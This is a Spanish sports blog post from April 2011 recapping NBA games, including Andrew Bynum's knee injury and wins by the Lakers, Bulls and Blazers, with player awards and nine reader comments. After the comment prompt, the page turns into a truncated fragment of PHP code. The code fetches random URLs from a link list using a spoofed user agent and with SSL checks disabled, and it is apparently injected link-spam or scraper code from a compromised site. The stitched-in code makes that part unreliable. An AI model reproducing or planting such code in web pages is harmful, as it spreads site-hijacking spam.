La Crónica (12/04/2011)

13 de April de 2011 por txusma

¡Alarma amarilla! Finalmente los Lakers rompieron la racha de derrotas que acumulaban en los últimos 5 partidos pero el precio a pagar puede haber sido fatal. A mediados del segundo cuarto, Andrew Bynum, caía al suelo tras pisar el pie de DaJuan Blair y se quedaba allí sentado doliéndose de su rodilla izquierda. Minutos más tarde se retiraría a los vestuarios y ya no volvería a saltar a la cancha. Hoy le harán pruebas y de confirmarse una baja prolongada las opciones de los Lakers en Playoffs bajarían enteros. Horas de tensión para Jack Nicholson y el resto de aficionados.

El partido en sí no se decidiría hasta los últimos minutos y eso que Popovic dejó sin jugar a Ginobili, Duncan y Parker y por parte de los Lakers no descansó nadie. Phil Jackson debe querer asegurar la 2ª plaza (a su alcance con una victoria en Sacramento) y enchufar a su quinteto titular de cara al tramo decisivo de la temporada. Sí faltaron Matt Barnes, tocado de la rodilla, y Steve Blake, que parece haber contraído la varicela en el peor momento posible (93-102).

Los Bulls pueden acabar empatados esta misma noche con los Spurs en el primer puesto de la liga regular gracias a su victoria frente los Knicks (103-90). De acabar empatados y alcanzar ambos la final, una moneda decidiría cual de los 2 equipos tiene la ventaja de campo ya que sus enfrentamientos directos han ganado el mismo número de partidos y en el resto de criterios también están empatados. Anoche, Derrick Rose, Carlos Boozer y Luol Deng se bastaron para imponerse a New York gracias a un parcial de 26-2 al inicio de la 2ª parte.

Y en el último partido de la noche victoria de los Blazers sobre los Grizzlies que les asegura la sexta plaza del Oeste (89-102). Está por ver a qué juegan esta noche Memphis y New Orleans ya que el termine séptimo tiene todos los números de enfrentarse a los Lakers. ¿Vosotros prefirirías a los amarillos o a los Spurs en primer ronda?

PREMIOS

MVP: Gran partido de Pau Gasol que cogió el mando de la zona amarilla tras la lesión de Andrew Bynum. Anoche consiguió 17 puntos, 17 rebotes y 5 asistencias.

Rookie: Tiago Splitter fue titular y consiguió 8 puntos y 8 rebotes.

Sorpresa: Buen día para Rudy Fernández. El español sólo falló uno de los 6 tiros a canasta que intentó y acabó con 18 puntos. Por su parte, Hamed Haddadi contó con 20 minutos y los aprovechó con 9 puntos y 10 rebotes.

Decepción: Si Kyle Korver no es capaz de anotar ningún lanzamiento, ¿para qué sirve?

Esfuerzo en vano: Carmelo Anthony volvió a tirar del carro neoyorkino pero sin Amare pesa demasiado. 21 puntos insuficientes ante Rose y los suyos.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Juas! Dajuan Blair ha aprendido de Bruce Bowen!!!!

      Citar

  2. Denise dice:
    #2

    No he visto el partido, pero segun Marca ” Bynum abandonó el Staples Center por su propio pie y afirmando que la lesión no era nada.”

      Citar

  3. CAMPO2 dice:
    #3

    Tu lo has dicho, segun Marca

      Citar

  4. Txusma dice:
    #4

    A nadie le preocupa que los Lakers sólo se despegaran en los últimos minutos cuando se enfrentaban a los suplentes de los Spurs?

      Citar

  5. Len Bias dice:
    #5

    Jaja qué grande la frase sobre Korver!

      Citar

  6. Javijaen dice:
    #6

    Uf, si que le dais caña a los Lakers, no confiais en el corazón de los campeones… Bueno, partido serio de Knicks, pero el quinteto Rose-Bogans-Boozer-Noah-Deng es demasiado poderoso, aunque atentos a la segunda unidad, mucho menos potente. En Knicks, partido serio pero sin rebotes ofensivos (poquísimos), defensa horrible ante Boozer que se hinchó, y un porcentaje de tiro horrible en la segunda parte (en el descanso 55-52 a favor de New York). Pensando en que Boston explotará estos aspectos da que pensar, ya que hace falta un center grande y duro y que vuelva Stodemire ya!! (bueno, a partir de mañana…)

      Citar

  7. max dice:
    #7

    Respondiendo a tu pregunta, Txusma, creo que a Memphis le conviene perder el último partido y enfrentarse a San Antonio antes que a Lakers. Yo creo que el reto de Memphis es intentar ganar el primer partido de play off de su historia, después de los “roscos” que se llevaron en la época Pau Gasol, y me parece más fácil que le ganen uno a SAS que a LAL, más que nada por si a estos últimos les da por empezar a jugar en serio.

      Citar

  8. Txusma dice:
    #8

    La 2ª unidad de los Bulls es capaz de mantener el ritmo de la primera y no está exenta d calidad. Brewer, Gibson, Asik, Watson, Thomas… están dando minutos más que interesantes.

    @max Posiblemente hagan eso y Marc le pueda decir a su hermano que él si llevó a los Grizzlies a ganar su primer partido de playoffs de la historia.

      Citar

  9. Sempren dice:
    #9

    Pues no sé yo qué os diga, con la de partidos de caraja que tienen en LA… hasta puede que rascasen una victoria de todos modos xD.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>